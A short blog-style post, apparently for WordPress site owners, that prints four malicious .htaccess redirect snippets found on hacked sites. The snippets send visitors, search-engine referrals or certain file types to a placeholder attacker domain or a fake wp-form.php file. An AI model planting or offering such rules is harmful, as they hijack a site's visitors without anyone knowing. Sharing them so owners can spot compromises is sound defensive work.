Hacked: .htaccess redirect

The following snippit comes from a real hack. This code was found in the .htaccess files and checks for any traffic to be sent to the site and it automatically redirects to another site.

<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteBase /
        RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
        RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
        RewriteRule ^.*$ http://EVILHACKERSITE.COM [L,R]
</IfModule>

This code is slightly more clever and only redirects html or xml pages. This is clever because it’s not something you’d actually notice unless you went to a html file (something WP sites rarely do).

<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteRule ([^.]+\.(html|xml|))$ http://EVILHACKERSITE.COM [L,R]
</IfModule>

This one checks where you came from and if it was a search engine, redirects you.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://EVILHACKERSITE.COM/in.html?s=hg [R,L]
Errordocument 404 http://EVILHACKERSITE.COM/in.html?s=hg_err

Here’s another, that tries to blend the last two by detecting search engines or if you’re going to a named file extension (again, something most WordPress visitors never do) and redirect them.

<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteCond %{HTTP_USER_AGENT} (google|msn|aol|bing) [NC,OR]
        RewriteCond %{HTTP_REFERER} (yahoo|google|aol|bing) [NC]
        RewriteCond %{REQUEST_URI} /$ [OR]
        RewriteCond %{REQUEST_FILENAME} (html|htm|shtm|shtml|php|php3|php4|php5)$ [NC]
        RewriteCond %{REQUEST_FILENAME} !wp-form\.php$
        RewriteRule ^.*?$ /wp-form.php [L]
</IfModule>

Where this one gets super sneaky is that it made a file called wp-form.php, which looks like but is not a real WordPress file. In that file was a series of checks and redirects which sent the visitor to another website. Where this particular hack failed is that the wp-admin pages usually end in .php, so the site admin noticed that he was being redirected when he tried to go to, say, example.com/wp-admin/plugins.php – Ooops.